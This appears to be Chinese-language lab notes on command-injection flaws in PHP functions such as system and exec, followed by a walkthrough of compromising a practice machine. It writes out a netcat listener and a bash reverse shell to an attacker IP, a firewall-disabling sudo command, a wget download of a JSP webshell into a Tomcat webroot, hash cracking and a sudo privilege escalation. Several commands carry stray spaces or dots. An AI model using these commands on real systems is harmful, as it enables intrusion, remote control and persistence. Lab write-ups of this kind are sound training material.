命令執行漏洞介紹
- 當應用需要調用一些外部程序去處理內容的情況下,就會用到一些執行系統命令的函數。如PHP中的system、exec、shell_exec等,當用戶可以控制命令執行函數中的參數時,將可以注入惡意系統命令到正常命令中,造成命令執行攻擊。
- 調用這些函數執行系統命令的時候,如果將用戶的輸入作為系統命令的參數拼接到命令行中,又沒有過慮用戶的輸入的情況下,就會造成命令執行漏洞。
手動滲透流程
- 信息探測
- 深度挖掘,發現可利用命令漏洞
- 漏洞利用
- 查看臨時緩沖目錄: ls -alh /tmp/
- 查看home目錄,挖掘用戶信息:ls -alh/home/
- 查看具體用戶的目錄:ls -alh/home/用戶名/
- 查看系統信息: uname –a
- 利用ssh命令執行root權限命令:
- 使用ssh用戶名@localhost通過ssh登錄服務器是不需要身份驗證的;
- 查看bill用戶sudo命令的權限:ssh bill@localhost sudo –l
- 關閉防火牆: ssh bill@localhost sudo ufw disable
- 生成上傳shell
- 攻擊機啟動監聽netcat:nc -nlvp. 4444
- 靶場機器反彈tcp到shell:ssh bill@localhost sudo bash -i >& /dev /tcp/攻擊機IP/4444 0>&1
- 方法二-也可以上傳SHELL滲透測試技巧
- 開啟python簡易http服務器:python -m SimpleHTTPServer
- 利用命令執行下載木馬文件:ssh bill@localhost sudo wget "http:/ /ip:port/shell.jsp" -O /var/lib/tomcat8/webapps/ROOT/shell.jsp
使用集成工具測試web命令執行漏洞
- 信息探測
- 使用sparta工具進行信息探測
- 輸入sparta打開工具
- dirbuster需要設置的字典在這,設置已知信息
- 查看已經掃描到的敏感信息,發現一對hash
- 破解hash得到密碼,嘗試登陸,登陸成功
- 漏洞利用
- 使用AVWS工具進行掃描沒有發現漏洞
- 反彈shell
- 查找敏感信息,發現一個
- 進入該文件夾,發現兩個文件,查看說明,cutomPermissionApp是個用戶權限提升文件
- 使用string命令查看文件有哪些敏感字符串
- 發現敏感信息
- 去掉H得到一個密碼
- 嘗試登陸su:sudo su 回車輸入密碼成功提升權限